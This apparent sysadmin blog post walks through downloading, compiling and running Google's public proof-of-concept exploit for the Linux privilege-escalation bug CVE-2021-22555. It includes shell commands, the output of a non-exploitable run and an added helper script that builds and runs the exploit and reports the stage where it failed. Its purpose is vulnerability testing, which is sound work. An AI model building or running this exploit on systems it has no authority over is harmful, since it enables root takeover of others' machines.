Compiling the CVE-2021-22555 exploit Proof of concept

July 15, 2021 -
Tags: c, linux, quick, security, sysadmin

Today (Jul/15/2021), the (entertaining) article CVE-2021-22555: Turning \x00\x00 into 10000$ was published on Hacker News.

The related GitHub repository provides the source of the proof of concept; however, for programmers not familiar with C, it is not obvious how to compile it.

A list of affected kernel versions is also provided; however, there are cases where determining whether a given kernel is exploitable is not immediate.

To spare fellow sysadmins some hair-pulling, this article shows the procedure for compiling the PoC on modern Ubuntu/Debian machines, with comments.

Procedure

# Reference: https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555

# Download the PoC. Running code pulled from the internet always deserves caution; in this
# case, note that the source is Google's official security-research repository, and that the
# file is small enough to be reviewed before compiling it.
#
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c

# The PoC has to be built as a 32-bit (i386) executable: the vulnerable code sits in the
# kernel's 32-bit compatibility (compat) path of the netfilter setsockopt handling, which is
# only reached from a 32-bit process. On an x86_64 host that means installing the 32-bit
# development headers and libraries; on Debian/Ubuntu the gcc-multilib package pulls them in.
#
# Without this package, the build fails with confusing errors about missing headers, like:
#
#     /usr/include/linux/errno.h:1:10: fatal error: asm/errno.h: No such file or directory
#         1 | #include <asm/errno.h>
#
# (run as root, or prefix with sudo)
apt install --yes gcc-multilib

# Now compile it as a 32-bit, statically linked binary. -static makes the executable
# self-contained, so it can be copied to a host that has no 32-bit shared libraries installed.
#
gcc -m32 -static -o exploit exploit.c

# Check the binary: file(1) must report a 32-bit, statically linked ELF for Intel 80386. A
# 64-bit result means -m32 was dropped, and the PoC will not work at all.
#
file exploit
# exploit: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, BuildID[sha1]=7d69a76adf18149d1c076b1dda2cac96fda6d033, for GNU/Linux 3.2.0, not stripped

# Run it. The output below comes from a system that was not exploitable: the PoC gets through
# STAGE 0, reaches STAGE 1 and then cannot corrupt any message, so it gives up.
#
# Two caveats when reading the result. A failure in STAGE 0 means the namespace sandbox could
# not be created (for instance because unprivileged user namespaces are disabled), which says
# nothing about the kernel version. And since STAGE 1 relies on spraying the heap, a single
# failed run is not proof that the kernel is patched; repeat it before drawing conclusions.
#
./exploit
# [+] Linux Privilege Escalation by theflow@ - 2021
#
# [+] STAGE 0: Initialization
# [*] Setting up namespace sandbox...
# [*] Initializing sockets and message queues...
#
# [+] STAGE 1: Memory corruption
# [*] Spraying primary messages...
# [*] Spraying secondary messages...
# [*] Creating holes in primary messages...
# [*] Triggering out-of-bounds write...
# [*] Searching for corrupted primary message...
# [-] Error could not corrupt any primary message.
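
The helper script below is an added example, not part of the original article or of the Google repository. It wraps the build steps above with checks that tell a broken build environment apart from a PoC run that simply did not work on this kernel: it verifies that the toolchain can emit 32-bit static binaries, that the result is a 32-bit ELF, that unprivileged user namespaces (which STAGE 0 needs for its sandbox) are permitted, and it reports which STAGE a captured run gave up in. The file names exploit.c, exploit and exploit.log, the invocation argument "run", and the Debian-style sysctl kernel.unprivileged_userns_clone are assumptions made here for the example.

```shell
#!/bin/sh
# Added helper (not part of the original article or of the Google repository).
# It wraps the build steps above with checks that separate a broken build
# environment from a PoC run that merely did not work on this kernel.
# Assumed names: exploit.c (downloaded PoC), exploit (binary), exploit.log (captured run).

# Return 0 if the compiler can emit a 32-bit static binary at all. Without
# gcc-multilib this is where "asm/errno.h: No such file or directory" shows up.
have_m32_toolchain() {
    tmp=$(mktemp -d) || return 1
    printf '#include <errno.h>\nint main(void) { return errno; }\n' > "$tmp/t.c"
    gcc -m32 -static -o "$tmp/t" "$tmp/t.c" >/dev/null 2>&1
    rc=$?
    rm -rf "$tmp"
    return "$rc"
}

# Extract the ELF class ("32-bit" or "64-bit") from a file(1) description line,
# so a build where -m32 was forgotten is caught before anything is run.
# $1: one line of `file exploit` output. Prints nothing for non-ELF input.
elf_class_of() {
    printf '%s\n' "$1" | sed -n 's/^.*ELF \([0-9][0-9]*-bit\) .*$/\1/p'
}

# STAGE 0 of the PoC creates a namespace sandbox. Debian-style kernels gate that
# behind the sysctl kernel.unprivileged_userns_clone (1 = allowed); where the
# sysctl file does not exist, this check treats user namespaces as allowed.
# $1: the sysctl file to read (parameterised so it can be tested offline).
userns_allowed() {
    f=${1:-/proc/sys/kernel/unprivileged_userns_clone}
    [ -r "$f" ] || return 0
    [ "$(cat "$f")" = "1" ]
}

# Read a captured PoC run on stdin, in the format shown above ("[+] STAGE n: name"
# headers, "[-] Error ..." on failure), and print "ok" if no error line appeared
# or "failed in STAGE n: name" for the stage that gave up.
failed_stage() {
    awk '
        /^\[[+]\] STAGE/ { stage = substr($0, 5) }
        /^\[-\]/         { print "failed in " stage; found = 1; exit }
        END              { if (!found) print "ok" }
    '
}

# Build, verify the ELF class, warn about the sandbox prerequisite, then run the
# PoC with its output captured so that failed_stage can classify it afterwards.
build_and_run() {
    have_m32_toolchain || { echo "gcc cannot build 32-bit binaries: install gcc-multilib" >&2; return 1; }
    gcc -m32 -static -o exploit exploit.c || return 1
    cls=$(elf_class_of "$(file exploit)")
    [ "$cls" = "32-bit" ] || { echo "expected a 32-bit ELF, got: ${cls:-unknown}" >&2; return 1; }
    userns_allowed || echo "warning: unprivileged user namespaces are disabled; STAGE 0 will fail" >&2
    ./exploit 2>&1 | tee exploit.log
    failed_stage < exploit.log
}

# Only build and run when the script is invoked with the argument "run".
if [ "${1:-}" = "run" ]; then
    build_and_run
fi
```

With the page's own output fed to failed_stage, the result is "failed in STAGE 1: Memory corruption"; a run that stops at "Setting up namespace sandbox" would instead report STAGE 0, which points at the environment rather than at the kernel.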